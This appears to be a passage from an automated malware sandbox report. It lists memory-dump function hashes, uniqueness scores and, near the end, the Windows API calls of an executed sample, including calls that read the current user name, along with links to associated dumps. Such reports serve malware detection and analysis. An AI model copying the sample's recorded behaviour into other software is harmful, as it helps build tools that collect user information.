                                                                                                                                                                                  • Opcode Fuzzy Hash: 21a6a6c3837824c5bb5ab3b43e693d62a4089fc363e904ae9643d6cb4f43b73b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0BB35214B17CBE720DF9AE549B6277D8F70030DF00883A9595CEAC0DBB9D482AF51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0ca438595ec54ce90b6e2b8767f948dae1cb5c3ccd7bfc556d38772db17ae96c
                                                                                                                                                                                  • Instruction ID: 826ae6cbf4f82ac3f24af6bd8fececcf3593bee3c6605d6b9531cd9492db68b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ca438595ec54ce90b6e2b8767f948dae1cb5c3ccd7bfc556d38772db17ae96c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F08638911248DFCF40EFB5E54955C7FF4EB44208B5048A9D4459B350DF306E468F52
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 594442a6fe8074045f2123fed11743f265a514e44842e7037795780ab812a457
                                                                                                                                                                                  • Instruction ID: 50a5793ccff90f97e822598652823218012d4a4da26b2a0ddd5fae93b8de4de5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 594442a6fe8074045f2123fed11743f265a514e44842e7037795780ab812a457
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF0A7356041285BDB05D7A9A4556E9BFE9DB44229F1840ABE54CCB2C0DF32E942C750
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8782180dfaaf7b0854b09788176282fbb5911afd8c47e526b847af7241167501
                                                                                                                                                                                  • Instruction ID: 2f6a787a7ede8237e2534425a32016c205b06ac03e81df43217f984c7912147d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8782180dfaaf7b0854b09788176282fbb5911afd8c47e526b847af7241167501
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DF0CF36600211EFCF469F96CD48E697F72FF49354B0A8094E20A8F172C732C964EB00
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8d144a746445f2c3bc212a0c27d85b59ca6854ae974c8686183beef46c2feb83
                                                                                                                                                                                  • Instruction ID: b5556cb6cf04190b414197515bbac3aabe48027d0d890e88eb834717b7b5d555
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d144a746445f2c3bc212a0c27d85b59ca6854ae974c8686183beef46c2feb83
                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F04930A003198FCB54EFAAD4055DEBFF4FF88315B00452AE44AE3210DB306A05CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ac5088e2e91ead1364e1fe2e1048ce25f8b77b06673254278b7c7768caab038e
                                                                                                                                                                                  • Instruction ID: 4edbcee7001456cc4d66007b8cf599a591b6b400a0d60d3a6907162997b92241
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac5088e2e91ead1364e1fe2e1048ce25f8b77b06673254278b7c7768caab038e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 45F02B355183908FCB119B39E45964A7FB9DF81218B04086DE182C7651CF65A805CBA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0ce0154664e034d3b7ac9796ff24fc306cb2fb71e6aa97aa820ef4e563b9d31d
                                                                                                                                                                                  • Instruction ID: b42d1a268ebd2a1279bf87783ed34de9f6bc729d582344f02ca8598d4f3e2a1c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ce0154664e034d3b7ac9796ff24fc306cb2fb71e6aa97aa820ef4e563b9d31d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 43F0E533301A269FC714DF29D404C89BBB9EF816283098159E4498B721CB20ED40C7C0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fa11c361fbaecd126b17de86597f301d4b53ea69e7c2ba453a471ff945512d26
                                                                                                                                                                                  • Instruction ID: c1110b43ae4f2a9ce129da0a856550ecbce8ac3136dba9060531e87c8792c78c
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa11c361fbaecd126b17de86597f301d4b53ea69e7c2ba453a471ff945512d26
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCE0203D31031457CF14AE77B84889B7E5DD7C92257504839F6458B341DF719C0187B0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3a3621fb5aefc1f99ab1da9e204ba3111ca26198328273136411e1ec1eb43b0f
                                                                                                                                                                                  • Instruction ID: 3103a22ff78b9361a4fefa780f977019cadb3a0191230240a26c3711d6aa82b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a3621fb5aefc1f99ab1da9e204ba3111ca26198328273136411e1ec1eb43b0f
                                                                                                                                                                                  • Instruction Fuzzy Hash: C6E065381147548BCB20EB6AE44969E7BEADFC121DB00087DE186C7751CF66A8068F95
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 07f5077a78849904ea40ec7302b6918f439f281831fe2bafabce5f423d5de2b7
                                                                                                                                                                                  • Instruction ID: fc5b07e3ad6da18163fe684beb8a40e810062785974af697bd4f23141df35a0c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 07f5077a78849904ea40ec7302b6918f439f281831fe2bafabce5f423d5de2b7
                                                                                                                                                                                  • Instruction Fuzzy Hash: ACE0D83A6182544BCF0697A4B55D0DD3FA7CFC2119309456BF186DB653DF2448068BD6
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5d59e5300648e0a79a0225d8e19d1010153b24fe712909555d3a234bbd69af5e
                                                                                                                                                                                  • Instruction ID: 6444f5eb825c7085eba5bcb6ce5a799887f15f5ea14a448d75b0cd71de65b7ab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d59e5300648e0a79a0225d8e19d1010153b24fe712909555d3a234bbd69af5e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7E0ED34848996CFE720DA0EDD697ADBB70B70139DF180496D043EA195C7780AC4EB81
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0210d71473062b1f518ac519c63b6235dc75a3a772e2c8a7fbe1b9e668409465
                                                                                                                                                                                  • Instruction ID: 95190e1022d382f1f4432448a9912e83b9c6407ae9af2d156362c3a0ead7aff2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0210d71473062b1f518ac519c63b6235dc75a3a772e2c8a7fbe1b9e668409465
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72D0C23A3101245B4E0467AAB0094EE3BABDBC52593040529F146C7641CF2118064BD9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a00e6dc2af2862b31ab8e945d8d178e4e66a4b111b6c78d9ef6dca51f1a2549f
                                                                                                                                                                                  • Instruction ID: 5c69e0b469c88b145802d0f03ed040effabb1fb78773680f5aaa5762e9617e79
                                                                                                                                                                                  • Opcode Fuzzy Hash: a00e6dc2af2862b31ab8e945d8d178e4e66a4b111b6c78d9ef6dca51f1a2549f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 92E08635A02208DFCF40DFB4E704A9C77B1DF4430471148AB9408DF264D7346F049B10
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c87652753fb05883a041c06302be8f6dca9354fb1c7c6420ad4668a5bbdef875
                                                                                                                                                                                  • Instruction ID: 643e406a9c63b6820a8c155aee4250f496dc23d172e5a1ed84fab96070392b26
                                                                                                                                                                                  • Opcode Fuzzy Hash: c87652753fb05883a041c06302be8f6dca9354fb1c7c6420ad4668a5bbdef875
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53E0123C6092409FCB01EB2CE9556683FF6EBC63047440849D4458B395C635E8268711
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ee2fdb03feaae5f0e5d0e303ffeb71aaf9cdffa309da3abb7579fb762e654cd5
                                                                                                                                                                                  • Instruction ID: 9fb35230a444d53af3b4b6fa81ce4eb1de849792be49cbec3582932adcd21158
                                                                                                                                                                                  • Opcode Fuzzy Hash: ee2fdb03feaae5f0e5d0e303ffeb71aaf9cdffa309da3abb7579fb762e654cd5
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD0173074892BCB8B64DA2B885457AA569EB502C8B0804289487DA286EA70CC15DB11
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4ca7519ddb663db6ff59a54ddf8d4d1c281d06a68250a22c83e5f467e30d2ee5
                                                                                                                                                                                  • Instruction ID: 1ef5eeab39be2457ded8939d5aa6231b7fe702ef66bb9b729a0454c10111b074
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ca7519ddb663db6ff59a54ddf8d4d1c281d06a68250a22c83e5f467e30d2ee5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E09A3044899BDAE724DA0ECD597BDBB60A74039DF180455D003E9194C7B809C5EB81
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4651076c6f6b926e0f408c724ca91f7dc1b52f0a2d5d06180e2b4373993c6c98
                                                                                                                                                                                  • Instruction ID: 579a320d2daa65145de370a6a025932a9d79f54bc07152267ad5a455b979bb94
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4651076c6f6b926e0f408c724ca91f7dc1b52f0a2d5d06180e2b4373993c6c98
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25D02232A0032CBB0704DAE854084CF7FADCA84034F00007AC708C7700EE701A0442D5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7501a8be4f65f9a5243d7ce7180370d468530f6cb3ce80ef4af49563a9c2ef74
                                                                                                                                                                                  • Instruction ID: 54cefe49fd8cc3f09d67ff5a3325993a30ee20142043e508a631cb450de4ed9c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7501a8be4f65f9a5243d7ce7180370d468530f6cb3ce80ef4af49563a9c2ef74
                                                                                                                                                                                  • Instruction Fuzzy Hash: 54D05B34A0220DEFCF40EFB4E60459DB7F9DB4420471044AAD808D7360DB316F049B50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0c8caabcd1608e9b42b82e386dbe7123527f02e07a26ce295f0457d4d13d38ac
                                                                                                                                                                                  • Instruction ID: 8effff7cd64bf7f8774bc938d8fdbc5a80a38248f205229664f919a4b336d677
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c8caabcd1608e9b42b82e386dbe7123527f02e07a26ce295f0457d4d13d38ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D0A976B041408FCB01EB28F8E11C83330DBBA3017061482C0018F7AACA2099138B95
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5cb7168c84d44d1daf9a7015005ba9b816a9486bb37801e3a5e6280dac0295ad
                                                                                                                                                                                  • Instruction ID: d75dcda0550a985041f1fc0a8374e385b055683996217d91b9b7e43fc33d1eda
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cb7168c84d44d1daf9a7015005ba9b816a9486bb37801e3a5e6280dac0295ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD012A6D296C797D340976554093547F71D707214F24069688E9E53E0C62485808B11
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f578a51ad98ec3f79cc40a7e74cbdb4a635d17c84dd7bd8325b9754630f03ae0
                                                                                                                                                                                  • Instruction ID: f5c26eabcb2855b961b1884a3ae16198a009a38feb1b3d157adc2417c51d8760
                                                                                                                                                                                  • Opcode Fuzzy Hash: f578a51ad98ec3f79cc40a7e74cbdb4a635d17c84dd7bd8325b9754630f03ae0
                                                                                                                                                                                  • Instruction Fuzzy Hash: E0C04C58F493859EDF05F77962183192E93E786318F184889C0419E2C9DA6554668316
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 59877a1d6022d9b087e5c9047063d65c9f94d581c834a5d255c2b90d8053ee24
                                                                                                                                                                                  • Instruction ID: 257ac47fa1d25b4ec7e3ae5ba0539853484c98f949fbbf15f209968f1997e2e3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 59877a1d6022d9b087e5c9047063d65c9f94d581c834a5d255c2b90d8053ee24
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07A02230C8020CCFC2003BB2FA0E0083B2CEAC22033800020F00F8A00ACFB028028AA3
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 78438ed3695359bb1b2c3f89b60297ad85c6046f9253cedf2e94ed6691c8dbf5
                                                                                                                                                                                  • Instruction ID: c6f301d9996b08acb13059436e15ab36ab26a2d40d338d9d7cb93763d2ec7934
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78438ed3695359bb1b2c3f89b60297ad85c6046f9253cedf2e94ed6691c8dbf5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 94514E75A052488FDB58EF7BE55069AB7F3EBC8304B04C93AC4049F2B8EB7468468B51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000001.00000002.388189102.0000000003CA0000.00000040.00000001.sdmp, Offset: 03CA0000, based on PE: false
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1bfce5ef8066c52a3db46f1a7c12a021a7ce12ed6d4627a56866db16799a6734
                                                                                                                                                                                  • Instruction ID: de9edc8acec914f5b338e5e9b27aad26b242a5488e8507a7d885c0402303ef14
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bfce5ef8066c52a3db46f1a7c12a021a7ce12ed6d4627a56866db16799a6734
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98514074A056488FDB58EF7BE55069AB7F7EBC8304B04C93AC4049F2B8EF7468468B51
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00C81DCA
                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00C81DDF
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C81DE2
                                                                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00C81DF0
                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00C81E1E
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C81E21
                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00C81E31
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C81E34
                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C81F02
                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00C81F0B
                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C81F10
                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00C81F13
                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C81F1A
                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00C81F1D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$AllocateFree$NameUser
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3830529808-0
                                                                                                                                                                                  • Opcode ID: b212d4b4f36c6d16a63892f68d34a19f676f8f39f92dca31b7a5224e8aa7ce37
                                                                                                                                                                                  • Instruction ID: 2c7463c071bcf7a152d7efc330bc5f585a0ebad2f78a72b698fbb194388d3f5a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b212d4b4f36c6d16a63892f68d34a19f676f8f39f92dca31b7a5224e8aa7ce37
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A514175D00219ABDB10AFA5DC89BAFBBBCFF45348F144559ED05A3240DB749E05CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 00C81DCA
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00C81DDF
                                                                                                                                                                                    • Part of subcall function 00C81DA0: RtlAllocateHeap.NTDLL(00000000), ref: 00C81DE2
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 00C81DF0
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00C81E1E
                                                                                                                                                                                    • Part of subcall function 00C81DA0: RtlAllocateHeap.NTDLL(00000000), ref: 00C81E21
                                                                                                                                                                                    • Part of subcall function 00C81DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00C81E31
                                                                                                                                                                                    • Part of subcall function 00C81DA0: RtlAllocateHeap.NTDLL(00000000), ref: 00C81E34
                                                                                                                                                                                  • GetUserNameW.ADVAPI32(?,00000100), ref: 00C8CB92
                                                                                                                                                                                    • Part of subcall function 00C8EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 00C8EC64
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
